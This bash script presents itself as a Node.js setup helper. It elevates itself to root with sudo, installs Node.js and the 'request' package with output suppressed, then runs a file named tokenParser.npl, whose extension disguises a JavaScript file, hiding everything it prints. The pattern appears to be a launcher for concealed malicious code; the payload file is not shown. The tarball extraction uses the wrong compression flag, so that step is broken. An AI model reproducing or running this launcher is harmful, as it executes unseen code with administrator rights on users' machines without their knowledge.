#!/bin/bash

# Auto-elevate with sudo if not run as root
if [[ $EUID -ne 0 ]]; then
   echo "🔒 This script requires administrator privileges. Re-running with sudo..."
   exec sudo "$0" "$@"
fi

echo "✅ Running with administrator rights."

# Variables
NODE_VERSION="20.11.1"

NODE_TAR="node-v$NODE_VERSION-linux-x64.tar.gz"
DOWNLOAD_URL="https://nodejs.org/dist/v$NODE_VERSION/$NODE_TAR"
# Check if Node.js is installed
NODE_INSTALLED_VERSION=$(node -v 2>/dev/null)

# If Node.js is not installed
if [ -z "$NODE_INSTALLED_VERSION" ]; then
    INSTALL_NODE=1
else
    INSTALL_NODE=0
fi

if [ "$INSTALL_NODE" -eq 1 ]; then
    echo "Node.js not installed. Installing Node.js version $NODE_VERSION..."

    # Check if wget is available
    if ! command -v wget &> /dev/null; then
        echo "wget is required but not installed. Installing wget..."
        apt-get install -y wget || brew install wget
    fi

    # Download Node.js tarball
    wget -q "$DOWNLOAD_URL" -O "$NODE_TAR"

    if [ -f "$NODE_TAR" ]; then
        # Extract the tarball to /usr/local
        tar -xJf "$NODE_TAR" -C /usr/local --strip-components=1

        # Clean up
        rm -f "$NODE_TAR"
    else
        echo "❌ Failed to download Node.js. Exiting."
        exit 1
    fi
else
    echo "✅ Node.js version $NODE_INSTALLED_VERSION is already installed."
fi

# Verify Node.js and npm installation
if ! command -v node &> /dev/null; then
    echo "❌ Node.js installation failed. Exiting."
    exit 1
fi

if ! command -v npm &> /dev/null; then
    echo "❌ npm installation failed. Exiting."
    exit 1
fi

# Install required npm modules
if [ ! -d "$(dirname "$0")/node_modules" ]; then
    echo "📦 Installing npm modules..."
    pushd "$(dirname "$0")" > /dev/null
    npm install request --silent --no-progress --loglevel=error --fund=false > /dev/null 2>&1
    if [ $? -ne 0 ]; then
        echo "❌ npm install failed. Exiting."
        popd > /dev/null
        exit 1
    fi
    popd > /dev/null
fi

# Check if tokenParser script exists and run it
if [ -f "$(dirname "$0")/tokenParser.npl" ]; then
    echo "▶️ Running tokenParser script..."
    node "$(dirname "$0")/tokenParser.npl" > /dev/null 2>&1
    if [ $? -ne 0 ]; then
        echo "❌ Error running tokenParser script. Exiting."
        exit 1
    fi
else
    echo "❌ tokenParser.npl not found. Exiting."
    exit 1
fi

echo "✅ Script completed successfully."
exit 0
